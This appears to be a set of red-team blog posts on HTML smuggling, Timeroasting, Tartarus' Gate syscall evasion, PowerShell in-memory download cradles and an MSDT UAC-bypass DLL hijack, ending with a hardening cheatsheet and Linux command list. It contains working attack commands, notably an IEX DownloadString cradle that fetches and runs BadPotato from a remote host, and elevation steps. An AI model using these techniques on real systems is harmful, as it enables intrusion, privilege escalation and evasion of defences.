HTML Smuggling for Data Infiltration

Hello and happy new year! Today in this short blogpost we will be looking at a very simple but effective attack called HTML Smuggling. Briefly put this technique abuses HTML5 and JavaScript functions to infilitrate or exfiltrate data across and out of the network. This would also be classified as more of a phishing attack as it would rely on human interaction if you were looking for initial access or something similar.

 

 

Jumping right in we see the HTML and JavaScript code necessary to make this work (credit to ired.team & outflank.nl), we can see it loads our file in base64 into an array, goes through a few other initializations, and has it eventually downloaded onto the victim's machine through the browser. (Note the 2 variables that need to be replaced for your own testing)

To get the base64 of our target PE we need to simply run the command below:

Once we have initialized that variable with our base64 output our HTML file is ready to be hosted on a webserver and sent to our victim as an HTML link. Also you will need to have the executable file you encoded in the same directory as the HTML file you are hosting on the server. 

To start up a simple HTTP server to host locally use the following command:

Once the victim browsers to the server the file will automatically be downloaded to the victims machine as seen in the picture below:

All that would then be left is the victim to execute the file. This is just one of many ways to primarily infiltrate data into a network through what is mostly always an active and unfiltered port. I hope you see this as something useful to add to your red teaming arsenal, cheers :)

 

:LINKS:

https://www.ired.team/offensive-security/defense-evasion/file-smuggling-with-html-and-javascript

Gemini Security - Understanding HTML Smuggling (VIDEO) 

https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841

Intro to Timeroasting - A New Attack Against the Network Time Protocol (NTP)

Today we will be shortly covering a tool called "Timeroast" by SecuraBV which takes advantage of the Network Time Protocol (NTP) in Active Directory environments. This protocol is utilized when a system needs to synchronize its clock to the domain controller and has since been secured due to MiTM attacks in the past against the protocol and systems clock's. This more 'secure' feature is exactly what we'll be taking advantage of with this tool.  Now although timeroasting is what you would consider a low probability attack, it is also a low effort attack which can be run in the background as further testing is continued. Let's go ahead and cover some more of the features and details of the tool and protocol.

 

In short, the secured version of NTP protocol includes the RID of the computer account in the NTP request and the server adds a response that uses the NTLM hash of the requesting computer account password and uses that as a key for encrypted protocol communication. Using Timeroast we are able to capture these hashes as their being communicated and potentially crack them offline with a Kali machine NOT directly connected to the domain! Also the tool also comes with a password cracker written in Python which is very handy in our case as these hash types are not supported by Hashcat and there are hashing issues with John as well.

Just quickly going into one downside to this attack is that the actual computer names are not included, only the RIDs assigned to them when the NTP hashes are captured. While it is possible to match RIDs to computer names we won't be covering that in this post (some quick ideas would be Kerberoasting as a potential way to gather usernames of the domain). Below you can see that hashes are dumped but no usernames are included, just the corresponding RID #s.

Gathering NTP hashes with timeroast.py

Also certain systems were currently not requesting time synchronization with the domain controller at the time of running the tool, so each time you run timeroast.py you seem to gather some already captured hashes and some new hashes. You could continue to run this tool until you feel like you have exhausted the list of users, or possibly you are already aware of the # of existing users in the domain and could continue to capture hashes until you reached that amount matching the # of users.

Managing to crack a hash with timecrack.py

With one of the passwords actually being recovered here using a simple wordlist with the included tool timecrack.py we can see that this does attack does indeed show some promise against gathering and cracking valid network credentials. Still not knowing the username this password matches to, we could potentially password spray these found credentials across the domain, or go another route and try and match it with an already known username we may be more sure it belongs to. The choice is up to your personal skillset and creativity on how exactly you could use these credentials to gain further access.

Happy hacking! :)
 

:LINKS:

https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf

https://github.com/SecuraBV/Timeroast

Bypassing EDR/AV Solutions with Tarturus' Gate - An evolution of Halo's Gate for Direct Syscall Malware

EDRs are constantly evolving with the cat-mouse nature of threats evolving and threat actors are becoming more cognizant of detection methods deployed. One technique EDRs are currently utilizing is 'hook' placement on certain Windows API function calls such as Nt* and Zw* functions. When this takes place and the hooked function is called it will replace the original syscall code and undergo certain measures to detect malicious activity.

One way to mitigate this security feature is direct syscalls. Simply put the code of direct syscalls is the syscall stub which is what forwards the execution to the code in Kernel mode and what we will be exploring some below:

In the above picture the syscall instruction is what transfers the execution flow when the values are assigned to the registers. The number moved into the eax register is the syscall # or system service number (SSN) which changes with Windows operating systems and service versions.

In the second picture here we also see the corresponding opcodes that comes with the above syscall stub (note the 0xBA is the syscall instruction # or SSN in this particular case for NtCreateProcess)

There are many ways to retrieve these syscalls, but today we'll be choosing Tarturus' Gate which utilizes Hell's / Halo's Gate which also adds a check to the 4th byte to see if it is 'E9' and if the byte is this opcode then we have further conclusion that the API call is hooked by the EDR.

In this picture we see Hell's gate checking the address of where the called function lies loaded in memory for any hooks as well as Tarturus' gate checking for the 'E9' byte for the jmp instruction and if found checks neighboring syscalls up and down until it finds one unhooked, then from there calculates what the SSN would be for the hooked API function from where it originally started searching to the offset of what the first unhooked function is.

Keeping in mind this is just a small addition to Halo's gate, EDRs are becoming more advanced in detecting the techniques of (in)direct syscalls by memory returns and where the API code is executed in memory. This is just a short example of one way to further circumvent API hooks for *certain* EDRs and the purpose of this post is to really try and just help develop the mindset of simple but effective additions to existing tools when a vendor has 'caught-on' to what once worked..the cat-and-mouse nature 🪤🐀

 

:LINKS:

https://github.com/boku7/AsmHalosGate/tree/main

https://blog.sektor7.net/#!res/2021/halosgate.md 

https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/

https://github.com/trickster0/TartarusGate/tree/master 

https://trickster0.github.io/posts/Halo%27s-Gate-Evolves-to-Tartarus-Gate/

AV Evasion via Powershell Cradles & Converting C# binaries into Powershell Scripts

 

In this technique we will be going over how to have our payloads downloaded via HTTP and then being loaded directly into memory. This would be a technique to evade some current AV/EDR vendors.

How this will be done is first, we will use PowerShellArmoury which has the script ConvertTo-Powershell.ps1 to convert any of our C# executables into Powershell scripts (for this example we will just be using a premade script from PowerSharpPack named BadPotato which has already gone through this process)
and next through Powershell download cradles, which just simply put is a single line command for download and execution of our code, we will be able to get the script into memory without ever touching disk!  (ALL LINKS ARE BELOW)
-------------------------------------------------------------------------------------------------------------------

Once we have our tools downloaded we can go into the PowerSharpBinaries directory and see all of the C# executables that have already been converted into Powershell for us

As mentioned before we'll be using BadPotato which is a C# executable for Windows 8-10 & Windows Server 2012-2019 privilege escalation.

With the commands
cat -raw .\Invoke-BadPotato.ps1
&
Invoke-BadPotato
we can see and verify that this script is working as a converted binary.

-------------------------------------------------------------------------------------------------------------------

Now how can we go about getting this powershell script loaded from an HTTP hosted source and inject it straight into memory so we never have a file touch disk? The answer is the tool Invoke-CradleCrafter v1.1

Using the commands

import-module .\Invoke-CradleCrafter.ps1
&
Invoke-CradleCrafter 

the tool loads up we'll be given with the choice to load the Powershell script into memory or disk. By choosing memory we will see a list of available cradles to download our payload

Choosing MEMORY\NETWEBSTRING\Invoke 2 we are given the result:

IEX ([System.Net.WebClient]::New().DownloadString('http://192.168.1.19:80/Invoke-BadPotato.ps1')) 

--> I edited the URL to match my Kali machine hosting the file. Once this command is run we can run another IN A NEW POWERSHELL INSTANCE:

Invoke-BadPotato

and we will see that our Powershell script was indeed downloaded and ran in memory successfully again!

Remember, this can be done with any pre-existing powershell scripts or ANY other C# binary you can think of Rubeus, Seatbelt, maybe even a DLL sideloader?

Thanks!🙂

 

(Just as a note, you made need to obfuscate the C# source code and/or the Powershell script if the AV/EDR your testing is detecting this. There are tons of resources out there on how to do this and may be featured in a future blog post!)

 

:LINKS:

PowerSharpPack

BadPotato

PowerShellArmoury

Invoke-CradleCrafter 

https://www.youtube.com/watch?v=BO0bVFZJmpg (Cyber Attack & Defense)

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html

UAC Hijack using MSDT to Elevate Privileges

MSDT is a Microsoft command binary that according to their Windows Commands Reference Page (reference below) "Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input."
 

Using Sysinternalsuite sigcheck.exe we can see that the command has the autoElevate setting set to true:
sigcheck.exe -m C:\Windows\System32\msdt.exe

 

This result means that UAC auto-elevation exists on this binary. Now although this is good news, upon research this tool does not auto-elevate on its own and must call a diagnostic package as noted above that requires admin privileges itself.

----------------------------------------------------------------------------------

Going further we see that the XML troubleshooting packages files that we need to call with MSDT are in the directory "C:\Windows\diagnostics\index" and if we run the command:

findstr /s /i /m "RequiresAdminPrivileges>True" C:\WINDOWS\diagnostics\index\*

 

then we see what troubleshooting packages require elevation themselves for this bypass to work.

----------------------------------------------------------------------------------

So using the syntax for the tool (Windows Commands Reference Page) we come up with the command:

c:\windows\syswow64\msdt.exe -path C:\WINDOWS\diagnostics\index\BluetoothDiagnostic.xml -skip yes

(the -skip yes command is to bypass the troubleshooting prompt and automatically start troubleshooting)
 

and the result is an elevated instance of msdt.exe being spawned!

msdt.exe elevated instance spawned

 

----------------------------------------------------------------------------------

We also uncover that msdt.exe also spawns sdiagnhost.exe with elevated privs which searches for the file BluetoothDiagnosticUtil.dll. Using procmon filters we uncover that C:\Users\USER\AppData\Local\Microsoft\WindowsApps\BluetoothDiagnosticUtil.dll is one of the directories it searches for the file and it just so happens to result in 'NAME NOT FOUND'.

This is good for two reasons 1) This path is writeable for the user 2) this gives us elevated DLL loading with a Microsoft binary

missing DLL to hijack

 

 ----------------------------------------------------------------------------------

Utilizing this technique we can successfully have our malicious DLL loaded by the sdiagnhost.exe process that is spawned with ELEVATED privileges from msdt.exe meaning our malicious file upon execution will now give us an elevated shell!!

 

LINKS:

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msdt - (Windows Commands Reference Page)

https://strontic.github.io/xcyclopedia/library/msdt.exe-152D4C9F63EFB332CCB134C6953C0104.html

https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass 

https://github.com/hfiref0x/UACME/tree/master

System Security Cheatsheet

HDD / HARDWARE

-BACKUPS (Operating Systems / cfg files / Rule Sets)

-Flash BIOS (coreboot / libreboot)

-Encrypt root user directory / encrypt individual users file systems (LUKS / eCryptfs)

-Veracrypt to create hidden encrypted partitions

-Secure kernel parameters & boot options

 

-USB-port security

----------------------------------------------

SERVICES

 

-Firewall all access to web-GUIs -- disable access to config files

-Secure Cron Jobs / Windows Events 

 

-Disable Unnecessary services / daemons

 

-Ensure $path variables are set-in-stone

 

-Change normal directory of log files & secure their permissions

-Disable access to programming languages for users if NOT needed (access to /user/bin/python3..etc) so that tty shells cant be spawned
 

-Other shell escapes (emacs, less, view, more, vim) -- use sudoedit (cant escape)

-Limit text editing in general (cat, cut, awk, sed) --> ANYTHING used to edit a file/write to a file

-Disable username/login to SSH - require key only

----------------------------------------------

USERS / FILES

 

-Create ACL with 0 trust ---- edit $PATH variables for users to only very specific programs (restricted shells)

-Disable root account / logins for services (ssh / ftp)

 

-Stepdown accounts for admin privs

-Secure system log files

 

-Password policies such as limiting login count to 3

-SEARCH for SUID/SGID bit set files. secure these!!

-Set 'nosuid' on /home partitions && all others. just not /boot or '/'
^^ purpose of having separate partitions

-Extended file attributes (chattr) - keep from important files being overwritten || added users

-The less directories/files root users own the BETTER - meaning if it can be exploited with ROOT privileges

--------------------
user | group | others
rwx  | rwx   | rwx
421  | 421   | 421
--------------------
777     +2000 = SGID (set group ID)
660     +4000 = SUID (root privs anyone who permissions)
    +1000 = STICKY BIT (only allows root/owner to delete/modify)
--------------------

----------------------------------------------

SECURITY TOOLS

*DISABLE access to cfg files*

 

-auditd - audits system calls / directories / file executes,reads,writes

-OpenSCAP / Nessus / OpenVAS - will scan system based off of security profiles/protocols and remediate 4 u

-Lynis - will scan file system for misconfigs/vulnz

-Security Onion - opensource SIEM featuring tools like Wazuh / ZUI

 

-Snort & Suricata - IDS / IPS

-opnSENSE & pfSENSe - opensource router & firewalls with many security add-ons

-AIDE (HIDS) - file and directory integrity checker

-Crowdsec - HIDS

 

-Chainsaw - threat hunting tool based off of SIGMA ruleset

 

----------------------------------------------

ROUTER/FIREWALL/IDS RULES

-Disable ICMP replies --> Detect Nmap

 

-YARA / SIGMA rulesets

 

-Change ports / fingerprints of internet-facing services

-Security in layers

 

-MiTM detection

 

-DNS spoofing / typo squatting

 

-Login counts / unsuccessful logins

 

-Disable access to internet facing services unless specified IP address / MAC address control

-Hardened against IP/MAC address spoofing

 

-Only allow specified IP addresses to connect to web services (firewall GUI/router)

Linux Commands

 

  FILE COMMANDS

nano - command line text editor  

tee - writes to standard output file w/o opening   

echo - used to read/write strings to files

grep - filters strings within a file within a directory

whereis - locates binary files

which - find path variable for binary

find - '/ -type f -name apache' - will look through '/root' directory for files with apache in the name

wildcard - 'find /etc -type f --name apache2.*' will search for any file name with apache2 with any extension preceding within '/etc' folder

cat >> - will append a 'string' to an already existing file

touch - displays file modification date & can also create files

head & tail - view first 10 (optional) or last 10 (optional) lines of text from a file

nl - will display a file with number lines 

sed - 'stream editor' and will replace a string in a file with a new string mysql -> MySQL globally or specifically

less - find specific string within file

ln - creates a hardlink to a file

diff - difference of strings between two files